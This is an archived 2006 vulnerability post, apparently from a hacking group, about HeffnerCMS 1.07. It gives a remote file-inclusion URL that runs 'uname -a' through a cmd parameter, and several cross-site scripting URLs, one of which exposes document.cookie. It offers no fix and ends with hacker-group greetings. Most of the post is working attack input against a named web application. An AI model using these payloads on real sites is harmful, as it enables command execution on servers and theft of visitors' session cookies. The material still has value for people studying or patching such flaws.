Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11941
HistoryMar 25, 2006 - 12:00 a.m.

HeffnerCMS Remote Command Exucetion And Cross Scripting Attack

2006-03-2500:00:00
vulners.com
8

Website : http://www.christian-heffner.de

Version : 1.07

I.

<?php

$filename="index.php";

require_once 'vlib/vlibTemplate.php';

    $tmpl = new vlibTemplate&#40;&#39;tmpl/std/index.tpl&#39;&#41;;
    
    require_once &#39;config/db_config.php&#39;;

    require_once &#39;config/pcfunctions.php&#39;;

Ucuyor… :) lol

II. Vulnerable code ;

http://www.site.com/index.php?page=evilcode.txt?&amp;cmd=uname -a

III. Cross Scripting Attack

http://www.site.com/index.php?page=&lt;script&gt;alert&#40;document.cookie&#41;&lt;/script&gt;

http://www.site.com/index.php?page=&lt;script&gt;alert&#40;Patriotic Hackers)</script>

Etc…

IV. Solution

No

Greetz ; B3g0k,Azad,Nistiman,Hawar,Seyh and other our friends…

irc.gigachat.net #kurdhack

www.PatrioticHackers